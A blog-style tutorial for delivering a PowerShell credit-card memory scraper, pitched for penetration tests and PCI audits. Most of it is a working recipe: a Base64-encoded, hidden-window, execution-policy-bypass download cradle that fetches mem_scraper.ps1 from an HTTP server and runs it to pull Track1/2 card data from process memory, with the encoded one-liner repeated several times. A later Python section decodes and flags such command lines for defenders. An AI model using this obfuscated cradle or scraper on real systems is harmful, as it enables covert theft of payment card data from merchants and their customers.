Obfuscated PowerShell Memory Scraping for Credit Cards

Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, with the obfuscation technique improved by using -EncodedCommand
* A one-liner PowerShell downloader does the dirty work without leaving any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance

  • (1) Set up a server hosting the memory scraper for download
  • (2) Encode the PowerShell downloader one-liner using -EncodedCommand (Base64)
  • (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
  • (4) Execute the obfuscated script on the host; it downloads the memory scraper and parses the process memory of notepad.exe for credit card Track1/2 data, validating candidates with the Luhn algorithm

The one-liner below combines the switches -NoP -NonI -W Hidden -Enc (NoProfile, NonInteractive, a hidden window, and EncodedCommand):

  • powershell.exe -exec bypass -NoP -NonI -W Hidden -Enc "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA"

(1) On the server, set up a lightweight HTTP server

  • Copy mem_scraper.ps1 into a directory and serve it with python -m SimpleHTTPServer (listens on port 8000 by default)

(2) Encode the PowerShell downloader one-liner using -EncodedCommand (Base64)

The following PowerShell command is going to be Base64-encoded and passed via -EncodedCommand instead of -Command:

  • powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;"

Reference: https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

  • EncodedCommand

    Accepts a base-64-encoded string version of a command. Use this parameter
    to submit commands to Windows PowerShell that require complex quotation
    marks or curly braces.

# To use the -EncodedCommand parameter:
$command = "(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)   # "Unicode" here means UTF-16LE, the encoding -EncodedCommand expects
$encodedCommand = [Convert]::ToBase64String($bytes)
# $encodedCommand now holds the Base64-encoded command:
# KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA
powershell.exe -EncodedCommand $encodedCommand   # Test

Here is the reverse process, decoding the Base64 string back into the original command:
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand))

And the encode-and-run sequence from above collapsed into a single line:
$command = "(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($command); $encodedCommand = [Convert]::ToBase64String($bytes); powershell.exe -EncodedCommand $encodedCommand

The final obfuscated PowerShell one-liner is as follows:

  • powershell.exe -exec bypass -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA"
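As an added example, not part of the original post or of the mem_scraper project, the following Python works the encoding round trip above from the defender's side: it parses a process-creation command line such as the one-liner, expands abbreviated switches, decodes the -EncodedCommand payload (Base64 of UTF-16LE) and reports the traits this page's command exhibits. The switch-resolution order and the sample log lines are constructed assumptions for this example.

```python
import base64, binascii, re

# powershell.exe accepts any unambiguous prefix of a switch name (-Enc, -NoP, -NonI, -W, -exec);
# the first-match resolution order used here is an assumption made for this example.
SWITCHES = ["EncodedCommand", "ExecutionPolicy", "WindowStyle", "NoProfile", "NonInteractive", "Command"]
VALUE_SWITCHES = {"EncodedCommand", "ExecutionPolicy", "WindowStyle", "Command"}
# Script-text traits taken from the post's own one-liner and its execution-policy section.
INDICATORS = {"download_cradle": re.compile(r"\.Download(File|String)\(", re.I),
              "runs_dropped_script": re.compile(r"\./[\w-]+\.ps1\b", re.I),
              "policy_unrestricted": re.compile(r"Set-ExecutionPolicy\s+Unrestricted", re.I)}

def resolve_switch(token):
    # Map an abbreviated switch such as "-Enc" to its full name, or None if unknown.
    name = token.lstrip("-/").lower()
    return next((s for s in SWITCHES if s.lower().startswith(name)), None) if name else None

def encode_command(text):
    # The post's recipe: UTF-16LE bytes -> Base64, which is what -EncodedCommand expects.
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64):
    # Reverse of encode_command; None when the argument is not a valid -EncodedCommand payload.
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(cmdline):
    # Parse one process-creation command line; return switches, decoded text and findings.
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    switches, i = {}, 1  # tokens[0] is the executable
    while i < len(tokens):
        name = resolve_switch(tokens[i]) if tokens[i][:1] in ("-", "/") else None
        if name in VALUE_SWITCHES and i + 1 < len(tokens):
            switches[name], i = tokens[i + 1], i + 2
        else:
            if name:
                switches[name] = True
            i += 1
    decoded = decode_encoded_command(switches["EncodedCommand"]) if "EncodedCommand" in switches else None
    findings = [k for k, hit in [
        ("encoded_command", "EncodedCommand" in switches),
        ("execution_policy_bypass", str(switches.get("ExecutionPolicy", "")).lower() == "bypass"),
        ("hidden_window", str(switches.get("WindowStyle", "")).lower() == "hidden"),
        ("noprofile_noninteractive", "NoProfile" in switches and "NonInteractive" in switches)] if hit]
    script_text = str(switches.get("Command", "")) + " " + (decoded or "")
    findings += [label for label, rx in INDICATORS.items() if rx.search(script_text)]
    return {"switches": switches, "decoded": decoded, "findings": findings, "score": len(findings)}

# Constructed sample "Process Command Line" values; the first re-encodes the post's one-liner.
PAGE_CMD = ("(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1',"
            "'mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;")
SAMPLE_LOGS = ['powershell.exe -exec bypass -NoP -NonI -W Hidden -Enc "%s"' % encode_command(PAGE_CMD),
               'powershell.exe -NoProfile -Command "Get-Process"']
```

Run analyze() over the "Process Command Line" field of Windows 4688 or Sysmon process-creation events; a score of several findings on one line is a strong hunting lead, and the decoded text shows what the Base64 was hiding.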

(3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
The Set-ExecutionPolicy cmdlet enables you to determine which Windows PowerShell scripts (if any) will be allowed to run on your computer. Windows PowerShell has four different execution policies:

  • Restricted – No scripts can be run. Windows PowerShell can be used only in interactive mode.
  • AllSigned – Only scripts signed by a trusted publisher can be run.
  • RemoteSigned – Downloaded scripts must be signed by a trusted publisher before they can be run.
  • Unrestricted – No restrictions; all Windows PowerShell scripts can be run.

Reference: https://technet.microsoft.com/en-us/library/ee176961.aspx

(4) Execute the obfuscated script on the host; it downloads the memory scraper and parses the process memory of notepad.exe for credit card Track1/2 data, validating candidates with the Luhn algorithm

